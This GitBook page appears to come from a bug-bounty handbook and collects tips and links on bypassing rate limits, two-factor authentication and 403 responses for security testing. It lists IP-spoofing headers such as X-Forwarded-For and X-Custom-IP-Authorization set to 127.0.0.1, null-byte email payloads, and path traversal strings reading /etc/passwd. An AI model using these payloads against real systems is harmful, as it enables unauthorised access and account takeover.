Bug Hunter Handbook
  • Introduction
  • Getting Started in InfoSec and Bug Bounties.
  • Presentations
  • Checklists / Guides
  • Useful Twitter Threads
  • List of Vulnerabilities
    • Recon and OSINT
      • Recon
      • Sensitive information using Github
      • Subdomain Enumeration
        • Resolvers
      • Javascript Enumeration
      • After Recon
      • Finding Information Using Public Resources
      • OSINT
      • Cloud
      • Wayback
      • Parameter / Content Discovery
      • Broken Link Highjacking
    • Host Header
    • Injection
      • Other Injection
    • DNS Rebinding
    • Cross Site Scripting (XSS)
      • Weaponizing XSS
      • WAF Bypass
    • Cross Origin Resource Sharing (CORS)
    • Local / Remote File Inclusion (LFI / RFI)
    • Server Side Request Forgery (SSRF)
    • Remote Code Execution (RCE)
    • XML Entity Injecton (XXE)
    • Price Manipulation
    • Directory / Path Traversal
    • Cross Site Request Forgery (CSRF)
      • JSON CSRF
    • Password Reset
    • Login Page Issues
    • Deserialization Attacks
    • File Upload
    • Account Takeover
    • Insecure Direct Object References (IDOR)
    • Open Redirect
    • Business Logic Flaws
    • Rate Limit Bypass / 2FA / OTP Bypass
    • Ruby on Rails
      • Mass Assginment
    • S3 Bucket
    • Race Condition
    • CRLF
    • SSTI
    • Prototype Pollution
  • Approach
  • API Security
  • Mobile Security
  • Fuzzing / Wordlists
  • BugBounty Short Write-ups
  • Burp Suite Tips and Tricks
  • HackerOne Reports
  • Response Manipulation
  • Client Vs Server Side Vulnerabilities
  • DevSecOps
  • Containers
    • Docker
    • Kubernetes
    • Containers
  • AWS
  • Azure
  • Others
    • Code Review
    • Web Sockets
    • Web Cache
    • HTTP Desync Attacks
    • Zone Transfer
    • CSP Bypass
    • Payment Bypasses
    • Http Parameter Pollution
    • Postmessage
    • Others
    • GraphQL
    • Unix / Linux
    • Email Related
    • Dependency confusion
    • Nginx Misconfigs
    • JIRA
    • OAUTH
  • Chaining of Bugs
  • Bug Bounty Automation
  • Mindmaps
  • Oneliner Collections
  • Red Teaming
  • Blue Teamining
  • Recon One Liners
  • Misc
  • Wordpress
  • Fuzzing / FuFF
  • OWASP ZAP
  • Bug List
  • Setting up burp collaborator
  • Admin Panel PwN
  • Credential Stuffing / Dump / HaveibeenPwned?
  • Tools Required
  • Nuclei Template
  • Other BugBounty Repos / Tips
  • Interview
  • Threat Modelling
  • AppSec
Powered by GitBook
On this page

Was this helpful?

  1. List of Vulnerabilities

Rate Limit Bypass / 2FA / OTP Bypass

PreviousBusiness Logic FlawsNextRuby on Rails

Last updated 3 years ago

Was this helpful?

  • https://medium.com/@huzaifa_tahir/methods-to-bypass-rate-limit-5185e6c67ecd

  • Wanna Bypass Rate Limit ? Try Bypass with adding null payload %00, %0d%0a, %09, %0C, %20, %0 on email. Not Works ? Just try adding "blank space" on the email, works!

  • https://shahmeeramir.com/4-methods-to-bypass-two-factor-authentication-2b0075d9eb5f

X-Originating-IP: IP
X-Forwarded-For: IP
X-Remote-IP: IP
X-Remote-Addr: IP
X-Client-IP: IP
X-Host: IP
X-Forwared-Host: IP
True-Client-IP: IP
X-Real-IP: IP

How to find authentication bypass vulnerabilities. Focus. I Added headers. Request GET /delete?user=test HTTP/1.1 Response HTTP/1.1 401 Unauthorized Reqeust GET /delete?user=test HTTP/1.1 X-Custom-IP-Authorization: 127.0.0.1 Response HTTP/1.1 302 Found #bugbounty #bugbountytips

  • https://blog.cobalt.io/bypassing-the-protections-mfa-bypass-techniques-for-the-win-8ef6215de6ab

  • https://notifybugme.medium.com/unauthorized-access-to-admin-setpassword-page-by-bypass-403-forbidden-f10bbb92ab35

everytime yu face a 401 Unauthorized respense add this header to the request : X-Custom-IP-Authorization: 127.0.0.1 #bugbountytips / X-Forwarded-Origin: 127.0.0.1

Bug Bounty Technique:

GET /page.php?path=../../etc/passwd

Forbidden 403 ?

Try One Of These:

(1)../../../etc/passwd%00

(2)....//....//....//etc/passwd

(3)%252e%252e%252fetc%252fpasswd

2FA - https://mazoka777.medium.com/two-factor-authentication-bypass-4c814627f8c3

I just happened to be able to bypass a 2FA in place during a recent engagement. And this was how I did it. #bugbountyTips #pentestTips Last /setup/ endpoint was by attacker while the first one is as victim.

Image
Logobugbounty/403-bypass at main · aufzayed/bugbountyGitHub